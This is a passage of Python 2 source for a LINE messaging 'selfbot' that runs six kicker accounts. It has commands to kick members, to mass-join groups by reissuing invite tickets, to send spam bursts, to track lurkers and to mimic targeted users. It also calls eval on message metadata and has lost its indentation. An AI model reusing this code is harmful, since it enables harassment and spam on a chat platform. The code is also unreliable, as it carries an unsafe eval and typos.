if wait["alwayRead"] == True: md+=" Read : on \n"
else:md+="�� Read : off \n"
if wait["detectMention"] == True: md+=" Autorespon : on \n"
else:md+=" Autorespon : off \n"
if wait["kickMention"] == True: md+=" Autokick: on ����\n"
else:md+=" Autokick : off \n"
if wait["Notifed"] == True: md+=" Notifed : on \n"
else:md+=" Notifed : off \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : on \n"
else:md+=" Notifedbot : off \n"
if wait["acommentOn"] == True: md+=" Hhx1 : on \n"
else:md+=" Hhx1 : off \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : on \n"
else:md+=" Hhx2 : off \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : on \n"
else:md+=" Hhx3 : off \n"
if wait["Protectcancl"] == True: md+=" Cancel : on \n"
else:md+=" Cancel : off \n"
if wait["winvite"] == True: md+=" Invite : on \n"
else:md+=" Invite : off \n"
if wait["pname"] == True: md+=" Namelock : on \n"
else:md+=" Namelock : off \n"
if wait["contact"] == True: md+=" Contact : on \n"
else: md+=" Contact : off \n"
if wait["autoJoin"] == True: md+=" Auto join : on \n"
else: md +=" Auto join : off \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : off \n"
if wait["leaveRoom"] == True: md+=" Auto leave : on \n"
else: md+=" Auto leave : off \n"
if wait["timeline"] == True: md+=" Share : on \n"
else:md+=" Share : off \n"
if wait["clock"] == True: md+=" Clock Name : on \n"
else:md+=" Clock Name : off \n"
if wait["autoAdd"] == True: md+=" Auto add : on \n"
else:md+=" Auto add : off \n"
if wait["commentOn"] == True: md+=" Comment : on \n"
else:md+=" Comment : off \n"
if wait["Backup"] == True: md+=" Backup : on \n"
else:md+=" Backup : off \n"
if wait["qr"] == True: md+=" Protect QR : on \n"
else:md+=" Protect QR : off \n"
cl.sendText(msg.to,"""
༺ πနးຫຮี่のีধ์͜͡ ༻
""" + md)
#======================================================#
elif msg.text in ["แท็ก1","Tag1"]:
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ\n\n" + str(wait["tag1"]))
elif msg.text in ["แท็ก2","Tag2"]:
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ\n\n" + str(wait["tag2"]))
elif "แท็ก1: " in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ")
elif "แท็ก2: " in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ᴍᴇssᴀɢᴇ ᴄʜᴀɴɢᴇᴅ")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JกP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["เช็คข้อความแอด","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set" in msg.text:
c = msg.text.replace("Message set","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text.lower() == 'me':
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["ผู้สร้าง"]:
msg.contentType = 13
msg.contentMetadata = {"mid":"u7a4febc4c650fc7679eadf4245c2a5ad"}
cl.sendText(msg.to," ༺ πနးຫຮี่のีধ์͜͡ ༻")
cl.sendMessage(msg)
elif "midเรา" == msg.text:
cl.sendText(msg.to,mid)
elif "1mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "2mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "3mid" == msg.text:
ki3.sendText(msg.to,kimid)
elif "4mid" == msg.text:
ki4.sendText(msg.to,ki2mid)
elif "5mid" == msg.text:
ki5.sendText(msg.to,kimid)
elif "6mid" == msg.text:
ki6.sendText(msg.to,ki2mid)
elif "คลิ้กmid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
ki6.sendText(msg.to,ki5mid)
elif "ชื่อ: " in msg.text:
string = msg.text.replace("ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
elif msg.text.lower() == 'เช็คออน์':
eltime = time.time() - mulai
van = "༺ πနးຫຮี่のีধ์͜͡ ༻\nเวลาการทำงานของบอท \n"+waktu(eltime)
cl.sendText(msg.to,van)
elif "ตัส: " in msg.text:
string = msg.text.replace("ตัส: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki6.getProfile()
profile.statusMessage = string
ki6.updateProfile(profile)
elif "ชื่อเรา: " in msg.text:
string = msg.text.replace("ชื่อเรา: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉 " + string + "👈")
elif "1ชื่อ: " in msg.text:
string = msg.text.replace("1ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "👈")
elif "2ชื่อ: " in msg.text:
string = msg.text.replace("2ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "3ชื่อ: " in msg.text:
string = msg.text.replace("3ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "4ชื่อ: " in msg.text:
string = msg.text.replace("4ชื่อ: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"༺ πနးຫຮี่のีধ์͜͡ ༻\n" + string + "⇇⇇👈")
elif "ตัสเรา: " in msg.text:
string = msg.text.replace("ตัสเรา: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio👉" + string + "⇇⇇👈")
elif "5ตัส: " in msg.text:
string = msg.text.replace("5ตัส: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"Update Names👉" + string + "⇇⇇👈")
elif "6ตัส: " in msg.text:
string = msg.text.replace("6ตัส: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"Update Names👉" + string + "⇇⇇👈")
elif "บอท" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
cl.sendMessage(msg)
elif "1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "6" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Mid: " in msg.text:
mmid = msg.text.replace("Mid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "kick " in msg.text:
midd = msg.text.replace("kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "เชิญ:" in msg.text:
midd = msg.text.replace("เชิญ:","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text in [".me","me","Me"]:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["กำ","กำกำ","กำกำกำ"]:
cl.sdndText(msg.to," กำควยหรือ \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["55","555","5555"]:
cl.sdndText(msg.to," ตลกมากหรอไอสัส...By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
elif msg.text.lower() == 'respon':
profile = ki.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki4.sendText(msg.to, text)
profile = ki5.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki5.sendText(msg.to, text)
profile = ki6.getProfile()
text = profile.displayName + " ༺ πနးຫຮี่のีধ์͜͡ ༻"
ki6.sendText(msg.to, text)
elif "Bot?" in msg.text:
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.sendText(msg.to,"Bot 💀1💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki2.sendText(msg.to,"Bot 💀2💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki3.sendText(msg.to,"Bot 💀3💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki4.sendText(msg.to,"Bot 💀4💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki5.sendText(msg.to,"Bot 💀5💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki6.sendText(msg.to,"Bot 💀6💀 \n ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "T say " in msg.text:
bctxt = msg.text.replace("T say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'บอทเข้า':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
elif msg.text.lower() == 'เข้า3':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() == 'เข้า6':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif "1เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif "2เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif "3เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif "4เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
elif "5เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif "6เข้า" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
elif msg.text.lower() == 'บอทออก':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye Bye " + str(ginfo.name) + "By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == "ออก":
# gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
gid = ki6.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
ki6.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "1ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif "2ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
elif "3ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
elif "4ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
elif "5ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
elif "6ออก" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Sayang say " in msg.text:
bctxt = msg.text.replace("Sayang say ","")
ki12.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
bctxt = msg.text.replace("Say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
ki6.sendText(msg.to,"Ping ")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["อ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"เปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"ปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif ("พูดตาม " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("ลบพูดตาม " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","เช็คพูดตาม"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "พูด " in msg.text.lower():
query = msg.text.lower().replace("พูด ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["1ของขวัญ","t1gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["ของขวัญ","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
